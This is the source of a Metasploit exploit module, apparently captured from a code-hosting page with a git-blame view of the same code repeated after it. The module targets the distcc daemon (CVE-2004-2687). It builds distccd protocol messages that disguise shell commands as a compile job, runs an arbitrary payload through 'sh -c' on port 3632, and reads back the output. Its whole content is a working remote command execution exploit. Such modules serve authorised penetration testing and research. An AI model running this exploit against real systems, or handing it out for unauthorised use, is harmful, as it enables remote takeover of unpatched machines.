metasploit-framework/modules/exploits/unix/misc/distcc_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DistCC Daemon Command Execution',
      'Description'    => %q{
        This module uses a documented security weakness to execute
        arbitrary commands on any system running distccd.

      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-2687'],
          [ 'OSVDB', '13378' ],
          [ 'URL', 'http://distcc.samba.org/security.html'],

        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby bash telnet openssl bash-tcp',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 01 2002'
      ))

      register_options(
        [
          Opt::RPORT(3632)
        ])
  end

  def check
    r = rand_text_alphanumeric(10)
    connect
    sock.put(dist_cmd("sh", "-c", "echo #{r}"))

    dtag = rand_text_alphanumeric(10)
    sock.put("DOTI0000000A#{dtag}\n")

    err, out = read_output
    if out && out.index(r)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    distcmd = dist_cmd("sh", "-c", payload.encoded);
    sock.put(distcmd)

    dtag = rand_text_alphanumeric(10)
    sock.put("DOTI0000000A#{dtag}\n")

    err, out = read_output

    (err || "").split("\n") do |line|
      print_status("stderr: #{line}")
    end
    (out || "").split("\n") do |line|
      print_status("stdout: #{line}")
    end

    handler
    disconnect
  end

  def read_output

    res = sock.get_once(24, 5)

    if !(res and res.length == 24)
      print_status("The remote distccd did not reply to our request")
      disconnect
      return
    end

    # Check STDERR
    res = sock.get_once(4, 5)
    res = sock.get_once(8, 5)
    len = [res].pack("H*").unpack("N")[0]

    return [nil, nil] if not len
    if (len > 0)
      err = sock.get_once(len, 5)
    end

    # Check STDOUT
    res = sock.get_once(4, 5)
    res = sock.get_once(8, 5)
    len = [res].pack("H*").unpack("N")[0]

    return [err, nil] if not len
    if (len > 0)
      out = sock.get_once(len, 5)
    end
    return [err, out]

  end


  # Generate a distccd command
  def dist_cmd(*args)

    # Convince distccd that this is a compile
    args.concat(%w{# -c main.c -o main.o})

    # Set distcc 'magic fairy dust' and argument count
    res = "DIST00000001" + sprintf("ARGC%.8x", args.length)

    # Set the command arguments
    args.each do |arg|
      res << sprintf("ARGV%.8x%s", arg.length, arg)
    end

    return res
  end
end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'DistCC Daemon Command Execution',`
			`'Description' => %q{`
			`This module uses a documented security weakness to execute`
			`arbitrary commands on any system running distccd.`

			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2004-2687'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '13378' ],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'URL', 'http://distcc.samba.org/security.html'],`

			`],`
			`'Platform' => ['unix'],`
			`'Arch' => ARCH_CMD,`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
Fix #5659: Update CMD exploits payload compatibility options 2015-08-10 22:12:59 +00:00			`'PayloadType' => 'cmd cmd_bash',`
			`'RequiredCmd' => 'generic perl ruby bash telnet openssl bash-tcp',`
Retab modules 2013-08-30 21:28:54 +00:00			`}`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Automatic Target', { }]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Feb 01 2002'`
			`))`

			`register_options(`
			`[`
			`Opt::RPORT(3632)`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`

			`def check`
			`r = rand_text_alphanumeric(10)`
			`connect`
			`sock.put(dist_cmd("sh", "-c", "echo #{r}"))`

			`dtag = rand_text_alphanumeric(10)`
			`sock.put("DOTI0000000A#{dtag}\n")`

			`err, out = read_output`
Check nil 2018-07-26 16:23:16 +00:00			`if out && out.index(r)`
Retab modules 2013-08-30 21:28:54 +00:00			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`connect`

			`distcmd = dist_cmd("sh", "-c", payload.encoded);`
			`sock.put(distcmd)`

			`dtag = rand_text_alphanumeric(10)`
			`sock.put("DOTI0000000A#{dtag}\n")`

			`err, out = read_output`

			`(err \|\| "").split("\n") do \|line\|`
			`print_status("stderr: #{line}")`
			`end`
			`(out \|\| "").split("\n") do \|line\|`
			`print_status("stdout: #{line}")`
			`end`

			`handler`
			`disconnect`
			`end`

			`def read_output`

			`res = sock.get_once(24, 5)`

			`if !(res and res.length == 24)`
			`print_status("The remote distccd did not reply to our request")`
			`disconnect`
			`return`
			`end`

			`# Check STDERR`
			`res = sock.get_once(4, 5)`
			`res = sock.get_once(8, 5)`
			`len = [res].pack("H*").unpack("N")[0]`

			`return [nil, nil] if not len`
			`if (len > 0)`
			`err = sock.get_once(len, 5)`
			`end`

			`# Check STDOUT`
			`res = sock.get_once(4, 5)`
			`res = sock.get_once(8, 5)`
			`len = [res].pack("H*").unpack("N")[0]`

			`return [err, nil] if not len`
			`if (len > 0)`
			`out = sock.get_once(len, 5)`
			`end`
			`return [err, out]`

			`end`


			`# Generate a distccd command`
			`def dist_cmd(*args)`

			`# Convince distccd that this is a compile`
			`args.concat(%w{# -c main.c -o main.o})`

			`# Set distcc 'magic fairy dust' and argument count`
			`res = "DIST00000001" + sprintf("ARGC%.8x", args.length)`

			`# Set the command arguments`
			`args.each do \|arg\|`
			`res << sprintf("ARGV%.8x%s", arg.length, arg)`
			`end`

			`return res`
			`end`
Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`